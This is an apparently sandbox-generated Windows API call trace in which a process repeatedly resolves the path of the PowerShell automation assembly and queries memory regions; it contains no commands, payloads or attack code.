	[0143.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.800] VirtualQuery (in: lpAddress=0x1cb2c0, lpBuffer=0x1cc180, dwLength=0x30 | out: lpBuffer=0x1cc180*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.802] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.803] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.805] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.807] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.808] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.808] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.809] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.809] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.809] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.809] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.809] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.810] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.810] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.810] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.810] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.811] VirtualQuery (in: lpAddress=0x1cb700, lpBuffer=0x1cc5c0, dwLength=0x30 | out: lpBuffer=0x1cc5c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.811] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.811] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.811] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.812] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.812] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x45a8b6a2, Data2=0xe819, Data3=0x42a4, Data4=([0]=0xae, [1]=0xe6, [2]=0xfd, [3]=0x15, [4]=0xa5, [5]=0x32, [6]=0x80, [7]=0xf))) returned 0x0
	[0143.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.914] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
